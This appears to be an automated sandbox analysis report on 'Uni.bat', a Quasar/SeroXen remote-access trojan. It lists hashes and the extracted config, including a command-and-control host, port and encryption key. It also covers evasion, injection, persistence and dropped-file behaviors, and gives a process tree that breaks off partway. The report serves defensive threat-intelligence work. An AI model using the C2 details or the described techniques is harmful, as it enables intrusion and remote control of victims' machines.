Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
28-11-2024 17:20
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
Uni.bat
Resource
win10ltsc2021-20241023-en
General
-
Target
Uni.bat
-
Size
10.4MB
-
MD5
2cc589a27044382be0ec55f23f36fa41
-
SHA1
4edc18c1b0e3558086e86d4e5c344fc9bed8d97c
-
SHA256
d05dd87b7ce909f8f3f85607f9546bcbe1168a507955c4d504d8c83f02d9a909
-
SHA512
baf948e4257cda2a0c30e9663448e884d40d844cc0f15cb64a9a2ccc40c12d1bdf1b5808d80b19c0f401478504468669d44edcdf0153f88d1b3ceb3303656045
-
SSDEEP
49152:C/JouIj6nHI8l5lK7g/JLyDX7YVDazqMdubv+JrncVzgH+60gF4SLF+pHGwhESAG:K
Malware Config
Extracted
quasar
1.4.0
v15.4.5 | SeroXen
map-casio.gl.at.ply.gg:57345
93520150-37f5-4b86-9682-b07d73e61808
-
encryption_key
E9B24DC5A9D33874B0626389429DD789286126DC
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
230
-
startup_key
$sxr-seroxen
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/1600-49-0x000001F37E910000-0x000001F37EFC0000-memory.dmp family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 5704 created 344 5704 WerFault.exe 106 -
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 948 created 624 948 Uni.bat.exe 5 PID 1600 created 624 1600 $sxr-powershell.exe 5 PID 1600 created 624 1600 $sxr-powershell.exe 5 PID 948 created 624 948 Uni.bat.exe 5 PID 948 created 624 948 Uni.bat.exe 5 PID 5816 created 344 5816 svchost.exe 106 -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation Uni.bat.exe -
Deletes itself 1 IoCs
pid Process 948 Uni.bat.exe -
Executes dropped EXE 12 IoCs
pid Process 948 Uni.bat.exe 1600 $sxr-powershell.exe 2972 $sxr-powershell.exe 3320 $sxr-powershell.exe 2164 $sxr-powershell.exe 4292 $sxr-powershell.exe 3728 $sxr-powershell.exe 1068 $sxr-powershell.exe 4384 $sxr-powershell.exe 460 $sxr-powershell.exe 3240 $sxr-powershell.exe 2636 $sxr-powershell.exe -
Hide Artifacts: Hidden Window 1 TTPs 11 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 1068 $sxr-powershell.exe 4384 $sxr-powershell.exe 460 $sxr-powershell.exe 3240 $sxr-powershell.exe 2636 $sxr-powershell.exe 1600 $sxr-powershell.exe 2972 $sxr-powershell.exe 4292 $sxr-powershell.exe 3728 $sxr-powershell.exe 3320 $sxr-powershell.exe 2164 $sxr-powershell.exe -
Drops file in System32 directory 22 IoCs
description ioc Process File created C:\Windows\System32\vcruntime140d.dll Uni.bat.exe File opened for modification C:\Windows\System32\vcruntime140d.dll $sxr-powershell.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\System32\ucrtbased.dll Uni.bat.exe File created C:\Windows\System32\vcruntime140_1d.dll Uni.bat.exe File opened for modification C:\Windows\System32\ucrtbased.dll Uni.bat.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll Uni.bat.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\vcruntime140d.dll Uni.bat.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\System32\ucrtbased.dll $sxr-powershell.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll $sxr-powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 948 set thread context of 332 948 Uni.bat.exe 86 PID 1600 set thread context of 824 1600 $sxr-powershell.exe 89 PID 1600 set thread context of 4576 1600 $sxr-powershell.exe 102 PID 948 set thread context of 3756 948 Uni.bat.exe 104 PID 948 set thread context of 3628 948 Uni.bat.exe 105 -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\$sxr-powershell.exe Uni.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe Uni.bat.exe File created C:\Windows\$sxr-seroxen1\$sxr-nircmd.exe Uni.bat.exe File created C:\Windows\$sxr-seroxen1\$sxr-Uni.bat Uni.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 344 cmd.exe -
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 54 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732814553" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 28 Nov 2024 17:22:35 GMT" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={48F3852C-80C8-4EFC-8BC2-B3FC8C353B59}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 948 Uni.bat.exe 948 Uni.bat.exe 948 Uni.bat.exe 332 dllhost.exe 332 dllhost.exe 332 dllhost.exe 332 dllhost.exe 948 Uni.bat.exe 948 Uni.bat.exe 1600 $sxr-powershell.exe 1600 $sxr-powershell.exe 1600 $sxr-powershell.exe 824 dllhost.exe 824 dllhost.exe 824 dllhost.exe 824 dllhost.exe 1600 $sxr-powershell.exe 1600 $sxr-powershell.exe 2972 $sxr-powershell.exe 2972 $sxr-powershell.exe 2972 $sxr-powershell.exe 2972 $sxr-powershell.exe 3320 $sxr-powershell.exe 3320 $sxr-powershell.exe 3320 $sxr-powershell.exe 3320 $sxr-powershell.exe 2164 $sxr-powershell.exe 2164 $sxr-powershell.exe 2164 $sxr-powershell.exe 2164 $sxr-powershell.exe 4292 $sxr-powershell.exe 4292 $sxr-powershell.exe 3728 $sxr-powershell.exe 4292 $sxr-powershell.exe 4292 $sxr-powershell.exe 3728 $sxr-powershell.exe 1068 $sxr-powershell.exe 1068 $sxr-powershell.exe 3728 $sxr-powershell.exe 3728 $sxr-powershell.exe 1068 $sxr-powershell.exe 1068 $sxr-powershell.exe 1068 $sxr-powershell.exe 4384 $sxr-powershell.exe 4384 $sxr-powershell.exe 4384 $sxr-powershell.exe 460 $sxr-powershell.exe 460 $sxr-powershell.exe 4384 $sxr-powershell.exe 4384 $sxr-powershell.exe 460 $sxr-powershell.exe 3240 $sxr-powershell.exe 3240 $sxr-powershell.exe 460 $sxr-powershell.exe 460 $sxr-powershell.exe 3240 $sxr-powershell.exe 3240 $sxr-powershell.exe 3240 $sxr-powershell.exe 2636 $sxr-powershell.exe 2636 $sxr-powershell.exe 2636 $sxr-powershell.exe 1600 $sxr-powershell.exe 1600 $sxr-powershell.exe 4576 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 948 Uni.bat.exe Token: SeDebugPrivilege 948 Uni.bat.exe Token: SeDebugPrivilege 332 dllhost.exe Token: SeDebugPrivilege 1600 $sxr-powershell.exe Token: SeDebugPrivilege 1600 $sxr-powershell.exe Token: SeDebugPrivilege 824 dllhost.exe Token: SeDebugPrivilege 2972 $sxr-powershell.exe Token: SeDebugPrivilege 3320 $sxr-powershell.exe Token: SeDebugPrivilege 2164 $sxr-powershell.exe Token: SeDebugPrivilege 4292 $sxr-powershell.exe Token: SeDebugPrivilege 3728 $sxr-powershell.exe Token: SeDebugPrivilege 1068 $sxr-powershell.exe Token: SeDebugPrivilege 4384 $sxr-powershell.exe Token: SeDebugPrivilege 460 $sxr-powershell.exe Token: SeDebugPrivilege 3240 $sxr-powershell.exe Token: SeDebugPrivilege 2636 $sxr-powershell.exe Token: SeDebugPrivilege 1600 $sxr-powershell.exe Token: SeDebugPrivilege 4576 dllhost.exe Token: SeShutdownPrivilege 4116 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4116 mousocoreworker.exe Token: SeShutdownPrivilege 4036 RuntimeBroker.exe Token: SeShutdownPrivilege 4116 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4116 mousocoreworker.exe Token: SeShutdownPrivilege 4036 RuntimeBroker.exe Token: SeShutdownPrivilege 4116 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4116 mousocoreworker.exe Token: SeShutdownPrivilege 4036 RuntimeBroker.exe Token: SeShutdownPrivilege 4116 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4116 mousocoreworker.exe Token: SeShutdownPrivilege 1012 dwm.exe Token: SeCreatePagefilePrivilege 1012 dwm.exe Token: SeAssignPrimaryTokenPrivilege 2628 svchost.exe Token: SeIncreaseQuotaPrivilege 2628 svchost.exe Token: SeSecurityPrivilege 2628 svchost.exe Token: SeTakeOwnershipPrivilege 2628 svchost.exe Token: SeLoadDriverPrivilege 2628 svchost.exe Token: SeSystemtimePrivilege 2628 svchost.exe Token: SeBackupPrivilege 2628 svchost.exe Token: SeRestorePrivilege 2628 svchost.exe Token: SeShutdownPrivilege 2628 svchost.exe Token: SeSystemEnvironmentPrivilege 2628 svchost.exe Token: SeUndockPrivilege 2628 svchost.exe Token: SeManageVolumePrivilege 2628 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2628 svchost.exe Token: SeIncreaseQuotaPrivilege 2628 svchost.exe Token: SeSecurityPrivilege 2628 svchost.exe Token: SeTakeOwnershipPrivilege 2628 svchost.exe Token: SeLoadDriverPrivilege 2628 svchost.exe Token: SeSystemtimePrivilege 2628 svchost.exe Token: SeBackupPrivilege 2628 svchost.exe Token: SeRestorePrivilege 2628 svchost.exe Token: SeShutdownPrivilege 2628 svchost.exe Token: SeSystemEnvironmentPrivilege 2628 svchost.exe Token: SeUndockPrivilege 2628 svchost.exe Token: SeManageVolumePrivilege 2628 svchost.exe Token: SeAuditPrivilege 2872 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2628 svchost.exe Token: SeIncreaseQuotaPrivilege 2628 svchost.exe Token: SeSecurityPrivilege 2628 svchost.exe Token: SeTakeOwnershipPrivilege 2628 svchost.exe Token: SeLoadDriverPrivilege 2628 svchost.exe Token: SeSystemtimePrivilege 2628 svchost.exe Token: SeBackupPrivilege 2628 svchost.exe Token: SeRestorePrivilege 2628 svchost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1600 $sxr-powershell.exe 5632 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1120 wrote to memory of 948 1120 cmd.exe 81 PID 1120 wrote to memory of 948 1120 cmd.exe 81 PID 948 wrote to memory of 332 948 Uni.bat.exe 86 PID 948 wrote to memory of 332 948 Uni.bat.exe 86 PID 948 wrote to memory of 332 948 Uni.bat.exe 86 PID 948 wrote to memory of 332 948 Uni.bat.exe 86 PID 948 wrote to memory of 332 948 Uni.bat.exe 86 PID 948 wrote to memory of 332 948 Uni.bat.exe 86 PID 948 wrote to memory of 332 948 Uni.bat.exe 86 PID 948 wrote to memory of 1600 948 Uni.bat.exe 87 PID 948 wrote to memory of 1600 948 Uni.bat.exe 87 PID 1600 wrote to memory of 824 1600 $sxr-powershell.exe 89 PID 1600 wrote to memory of 824 1600 $sxr-powershell.exe 89 PID 1600 wrote to memory of 824 1600 $sxr-powershell.exe 89 PID 1600 wrote to memory of 824 1600 $sxr-powershell.exe 89 PID 1600 wrote to memory of 824 1600 $sxr-powershell.exe 89 PID 1600 wrote to memory of 824 1600 $sxr-powershell.exe 89 PID 1600 wrote to memory of 824 1600 $sxr-powershell.exe 89 PID 1600 wrote to memory of 2972 1600 $sxr-powershell.exe 92 PID 1600 wrote to memory of 2972 1600 $sxr-powershell.exe 92 PID 1600 wrote to memory of 3320 1600 $sxr-powershell.exe 93 PID 1600 wrote to memory of 3320 1600 $sxr-powershell.exe 93 PID 1600 wrote to memory of 2164 1600 $sxr-powershell.exe 94 PID 1600 wrote to memory of 2164 1600 $sxr-powershell.exe 94 PID 1600 wrote to memory of 4292 1600 $sxr-powershell.exe 95 PID 1600 wrote to memory of 4292 1600 $sxr-powershell.exe 95 PID 1600 wrote to memory of 3728 1600 $sxr-powershell.exe 96 PID 1600 wrote to memory of 3728 1600 $sxr-powershell.exe 96 PID 1600 wrote to memory of 1068 1600 $sxr-powershell.exe 97 PID 1600 wrote to memory of 1068 1600 $sxr-powershell.exe 97 PID 1600 wrote to memory of 4384 1600 $sxr-powershell.exe 98 PID 1600 wrote to memory of 4384 1600 $sxr-powershell.exe 98 PID 1600 wrote to memory of 460 1600 $sxr-powershell.exe 99 PID 1600 wrote to memory of 460 1600 $sxr-powershell.exe 99 PID 1600 wrote to memory of 3240 1600 $sxr-powershell.exe 100 PID 1600 wrote to memory of 3240 1600 $sxr-powershell.exe 100 PID 1600 wrote to memory of 2636 1600 $sxr-powershell.exe 101 PID 1600 wrote to memory of 2636 1600 $sxr-powershell.exe 101 PID 1600 wrote to memory of 4576 1600 $sxr-powershell.exe 102 PID 1600 wrote to memory of 4576 1600 $sxr-powershell.exe 102 PID 1600 wrote to memory of 4576 1600 $sxr-powershell.exe 102 PID 1600 wrote to memory of 4576 1600 $sxr-powershell.exe 102 PID 1600 wrote to memory of 4576 1600 $sxr-powershell.exe 102 PID 1600 wrote to memory of 4576 1600 $sxr-powershell.exe 102 PID 1600 wrote to memory of 4576 1600 $sxr-powershell.exe 102 PID 1600 wrote to memory of 4576 1600 $sxr-powershell.exe 102 PID 1600 wrote to memory of 4576 1600 $sxr-powershell.exe 102 PID 4576 wrote to memory of 624 4576 dllhost.exe 5 PID 4576 wrote to memory of 680 4576 dllhost.exe 7 PID 4576 wrote to memory of 968 4576 dllhost.exe 12 PID 4576 wrote to memory of 412 4576 dllhost.exe 13 PID 4576 wrote to memory of 544 4576 dllhost.exe 14 PID 4576 wrote to memory of 524 4576 dllhost.exe 15 PID 4576 wrote to memory of 1012 4576 dllhost.exe 16 PID 4576 wrote to memory of 1036 4576 dllhost.exe 17 PID 4576 wrote to memory of 1108 4576 dllhost.exe 18 PID 4576 wrote to memory of 1192 4576 dllhost.exe 19 PID 4576 wrote to memory of 1244 4576 dllhost.exe 21 PID 4576 wrote to memory of 1304 4576 dllhost.exe 22 PID 4576 wrote to memory of 1348 4576 dllhost.exe 23 PID 4576 wrote to memory of 1360 4576 dllhost.exe 24 PID 4576 wrote to memory of 1368 4576 dllhost.exe 25 PID 4576 wrote to memory of 1504 4576 dllhost.exe 26 PID 4576 wrote to memory of 1548 4576 dllhost.exe 27 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:624
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1a3e8e7f-9e77-4055-baa2-113cfb5d52d9}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:332
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4bd26673-1d31-45ea-b5d0-58de6cd122ed}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:824
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ba83dc9a-53cb-4988-b2c6-e2610677259f}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4576
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{53725226-902f-47e1-bd28-5ae688ba1943}2⤵PID:3756
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a756c3d7-6f67-43e8-8082-0868c02eaacd}2⤵PID:3628
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:544
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1036
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1192 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2728
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1304
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1548
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2544
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1560
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1664
-
